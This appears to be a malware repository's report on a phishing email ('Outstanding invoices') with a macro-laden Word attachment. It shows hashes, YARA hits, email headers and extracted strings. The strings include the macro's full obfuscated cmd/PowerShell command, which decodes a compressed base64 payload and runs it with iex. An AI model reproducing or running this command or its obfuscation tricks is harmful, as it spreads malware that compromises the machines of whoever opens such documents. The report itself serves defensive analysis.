Sample details: bdb84fe7250ff050fd1581d3457bbe00 --

Hashes
MD5: bdb84fe7250ff050fd1581d3457bbe00
SHA1: b441e1318fa5ecc1d4dbc3611cc8d369ea34edc0
SHA256: 0839956ca84d000f813ffe35407a97005a2aed9397b0a46a088cc4e9db5c6ae7
SSDEEP: 1536:NLWdWiuiLiocn1kp59gxBK85fBt+a9SP:NEu+41k/W48s
Details
File Type: Composite
Added: 2018-11-06 19:11:23
Yara Hits
YRP/without_images | YRP/with_urls | YRP/powershell | YRP/office_document_vba | YRP/Contains_VBA_macro_code | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | YRP/Misc_Suspicious_Strings | YRP/Big_Numbers1 | FlorianRoth/PowerShell_Case_Anomaly |
Strings
		rcpg125"2
t@794-24& 9"7
8  (fax)I
:m 1@Q
TTh!1n
@!pndb 
y b P!
 ,a-!q Padd
!Bunau-0
iz1#f 5
 >b/y6
`Pwful3
Received: from MBX16D-ORD1.mex06.mlsrvr.com (172.29.1.48) by
 MBX16A-IAD3.mex06.mlsrvr.com (172.29.33.47) with Microsoft SMTP Server
 (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256_P256) id
 15.1.1466.3 via Mailbox Transport; Tue, 6 Nov 2018 13:04:16 -0500
Received: from MBX14C-ORD1.mex06.mlsrvr.com (172.29.1.40) by
 MBX16D-ORD1.mex06.mlsrvr.com (172.29.1.48) with Microsoft SMTP Server
 (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256_P256) id
 15.1.1466.3; Tue, 6 Nov 2018 12:04:15 -0600
Received: from gate.forward.smtp.iad3a.emailsrvr.com (204.232.172.40) by
 MBX14C-ORD1.mex06.mlsrvr.com (172.29.1.40) with Microsoft SMTP Server (TLS)
 id 15.0.1367.3 via Frontend Transport; Tue, 6 Nov 2018 12:04:15 -0600
Received: from [216.104.162.134] ([216.104.162.134:44898] helo=smtp01-smtp-4.daemonmail.net)
	by smtp22.gate.iad3a.rsapps.net (envelope-from <jct@jctomco.com>)
	(ecelerity 4.2.38.62370 r(:)) with ESMTP
	id 0C/0C-23706-E97D1EB5; Tue, 06 Nov 2018 13:04:15 -0500
Received: from mxw-out01.daemonmail.net (mxw-out01.daemonmail.net [216.104.161.15])
	by smtp01-smtp-4.daemonmail.net (Postfix) with ESMTP id 9D00C45BFC
	for <andrew@championsretreat.net>; Tue,  6 Nov 2018 10:04:14 -0800 (PST)
Received: from localhost (localhost [127.0.0.1])
	by mxw-out01.daemonmail.net (Postfix) with ESMTP id 6C70A41C6F
	for <andrew@championsretreat.net>; Tue,  6 Nov 2018 10:04:14 -0800 (PST)
Received: from mxw-out01.daemonmail.net ([127.0.0.1])
	by localhost (mxw-out01.daemonmail.net [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id hu-wSXwaCGU0 for <andrew@championsretreat.net>;
	Tue,  6 Nov 2018 10:04:12 -0800 (PST)
Received: from serv25.tierra.net (serv25.tierra.net [216.104.160.95])
	by mxw-out01.daemonmail.net (Postfix) with ESMTP id B456441C4E
	for <andrew@championsretreat.net>; Tue,  6 Nov 2018 10:04:12 -0800 (PST)
Received: from 10.14.60.23 (unknown [200.194.49.222])
	(Authenticated sender: jct@jctomco.com)
	by jctomco.com (Postfix) with ESMTPSA id 7A36C3EBEB
	for <andrew@championsretreat.net>; Tue,  6 Nov 2018 10:04:12 -0800 (PST)
From: "Mike Rymer mike@" <championsretreat.net jct@jctomco.com>
To: Andrew Press <andrew@championsretreat.net>
Subject: Outstanding invoices from Mike Rymer
Thread-Topic: Outstanding invoices from Mike Rymer
Thread-Index: AQHUdfshQ4/EJjy7t0GRqp+2G6ZMMg==
Date: Tue, 6 Nov 2018 18:05:03 +0000
Message-ID: <3974183605166217480.CC052E865C57ED3A@championsretreat.net>
Content-Language: en-US
X-MS-Exchange-Organization-AuthSource: MBX14C-ORD1.mex06.mlsrvr.com
X-MS-Has-Attach: yes
X-Auto-Response-Suppress: All
X-MS-TNEF-Correlator:
x-ms-exchange-organization-originalclientipaddress: 204.232.172.40
x-ms-exchange-organization-originalserveripaddress: 172.29.1.40
Content-Type: multipart/mixed;
	boundary="_002_3974183605166217480CC052E865C57ED3Achampionsretreatnet_"
MIME-Version: 1.0
--_002_3974183605166217480CC052E865C57ED3Achampionsretreatnet_
Content-Type: text/plain; charset="utf-8"
Content-ID: <F21A787B852E2F4983D60CBA6E3A7764@mex06.mlsrvr.com>
Content-Transfer-Encoding: base64
--_002_3974183605166217480CC052E865C57ED3Achampionsretreatnet_
Content-Type: application/msword; name="Untitled-KTY-C9485987.doc"
Content-Description: Untitled-KTY-C9485987.doc
Content-Disposition: attachment; filename="Untitled-KTY-C9485987.doc";
	size=74496; creation-date="Tue, 06 Nov 2018 18:04:16 GMT";
	modification-date="Tue, 06 Nov 2018 18:04:16 GMT"
Content-ID: <D77752A37DD3D244B3C386969BE095A6@mex06.mlsrvr.com>
Content-Transfer-Encoding: base64
--_002_3974183605166217480CC052E865C57ED3Achampionsretreatnet_--
/O=EXCHANGELABS/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=59AD09A89C2840378264FB47ED59B7F0-JCADORETTE
/O=EXCHANGELABS/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=59AD09A89C2840378264FB47ED59B7F0-JCADORETTE
SMTP:CHAMPIONSRETREAT.NET JCT@JCTOMCO.COM
SMTP:CHAMPIONSRETREAT.NET JCT@JCTOMCO.COM
CMD cMd.eXE/C  "SEt  cfS= (nEW-ObjeCt SYsTEM.iO.COmPRESSioN.DEfLATestREAm([IO.mEMorYstrEam] [SysTem.convErt]::FrOmBASe64sTRINg('NZBRa8IwFIX/Sh4CUZzpy0BmKFg23cpkPoiK4kua3s60aW5p03ZS/O+zhb6e8/Ed7qVf38630M4xSkE58gOOnyB6NxqsE1RvA5/dnCuWnifzItaV4wpzL1hfktWYmxh5Wpi86isuaw9O9+zYnNORUGgwj7SUvyUOjEJvfdnuiv1uMzJt2/JKVq6Odc94weE1Cccyl5GVVpdYD+v4yfi+MNpN2IpNBT2EmviELRZvTNBzcvQp2GbpIC9m7MpmfT9jHP6AiQRLkOo2oRgqoi3pL5x2rrx39PkJ/oGtNSjjjTYwMC+kF05FaBvMYB4+pUMioqcnEw8lnbp1j8c/') ,[SYSTem.iO.coMPREssioN.CompREsSioNmodE]::deCOmPResS )^| FOreAcH{ nEW-ObjeCt IO.STrEamReaDEr($_ , [TexT.ENCOdinG]::asCII )} ).ReADtOEND() ^| ^&( ([StrIng]$vErBOsePreFeReNCE)[1,3]+'x'-JoIn'')&&   pOWerSHELl   $2le87h  =[TYPe](\"{1}{3}{0}{2}\"-f'E','ENviR','NT','oNm'  )  ;  ${e`x`eCuTIoNC`ONtEXT}.\"in`VoKeC`O`MMAND\".(\"{0}{2}{3}{1}\" -f'i','Cript','nVo','kEs'  ).Invoke(  (   (  Get-VariaBLE (\"2L\"+  \"E87H\"  ) ).\"Va`lUe\"::(\"{2}{4}{0}{5}{3}{1}\"-f'ONMENT','ABLe','GeTEN','ArI','VIR','v').Invoke(  'cFS',(  \"{2}{1}{0}\" -f'sS','Oce','PR') )  )    )"
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
PKW}Rn
LzS.![
9.O@=s
\aQBQqo{4
9B7yhT
#+PzQE
{_69bw2
ZTjAN<
iVm:_1Vh
<7^+UPn
D`Ncl)=
u|\^,2
t]kZV`
D[f$[O
bO*p8<S
]u/h>&
us,z|~M
H!g>\.
Zg.Dj6
sA$nCCt
MFM]Y5
V_=v>`y
~enW.n
T'B5jA
 Xl@+,@
p0+Z<CJ
Z3I95g
;\m`=H<
RDl@*W
`XyL203
]b-NX%
P1eV_Q\
@&g$aB#
[{t_qn
\g+;kUB
_[_YEs
=79+G<
sY7m/u
?}ZWM%e
tW$x3+Q
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
theme/theme/theme1.xml
$4vq^W
MB[F7x"
>Yr]H+
a!e9#i
An7jah
theme/theme/_rels/themeManager.xml.rels
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
[Content_Types].xml
dlyLho
_rels/.rels
drs/e2oDoc.xml
drs/downrev.xmlL
@/8lR#
[Content_Types].xmlPK
_rels/.relsPK
drs/e2oDoc.xmlPK
drs/downrev.xmlPK
Normal.dotm
Microsoft Office Word
Jordyn-PC
Attribut
e VB_Nam
e = "wRw
KSaUDD"
ormal.Th
isDocume
VGlobaBl
Cre atabl
Pr@edecla
plateDer
$Custo
  Sub 
n Error 
qDq + jr
S / DHAV
@aFTjrl
G0uOUr
wTonjX
knBOsi *
 hmtEBL
 aQJNN
W@Hqdstk
u cqzdB
+ WtRWtA
jICHBn
XKKj@ruSGAC@
83684964
ell@ Sha
pes(1).T
Pnov`oCb, 
,vntmzv
@,(FEhrD
@OiCwBbA
n Ohjzn
D@PRLHk)C]h
T(npaF
a fMLLqC
CWqj"G@
 OlDIs
jQzvd!B
SGRpEA
UNjUMw 
Win64x
Project1
stdole
Project-
ThisDocument<
_Evaluate
Normal
Office
Documentj
wRwKSaUDD
Document_open
PLjqDq
jrTuBN
EUzUmz
aFTjrlL
YGFph=;
hwNTrj%_
LLkIw 
wTonjXm
knBOsi\
hmtEBL
PUzSzE
oskSWS
Hqdstk
ucqzdB
NJFKXL
zpqFhL
jICHBn
XKKjruSGAC
ShellV
Shapes
TextFrame
TextRange
XDfaVsMj
jPnovoCbI
OPSiL>
vntmzve
FEhrD..
OiCwBb
nOhjzn
PRLHk1
hizzj0
JNmiFa.
bajZnq
fMLLq/p
CKdMSj
mKusi/
NjnTaL
Gwkckq
HKdnEV{?
jQzvdq
GShTKm
ffvimf=
SGRpEs
nZEvWr"G
YfRqkV@m
UNjUMw
Project
\G{00d
0046}#
2.0#0#C:
\Windows
\system3
e2.tlb
#OLE Aut
omation
ENormal
!Offic
!G{2DF
8D04C-5B
FA-101B-
m Files\@Common
icrosoft
 Shared\
OFFICE16
\MSO.DLL
M 16.0
9wRwKSaU DDG
*\CNormalrU
ThisDocument
Project
wRwKSaUDD
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB
C:\Windows\system32\stdole2.tlb
stdole
C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL
Office
Document
Document_open
wRwKSaUDD
ID="{6B16B1AB-FF13-422F-8AAC-9DEC2FCDEE2C}"
Document=wRwKSaUDD/&H00000000
ExeName32="zrWOmHWwpu"
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="0B0944831B871B871B871B87"
DPB="E6E4A9E85F183B193B193B"
GC="C1C38E138F138FEC"
Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
wRwKSaUDD=0, 0, 0, 0, C
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
Normal.dotm
Microsoft Office Word
Jordyn-PC
SMTP:ANDREW@CHAMPIONSRETREAT.NET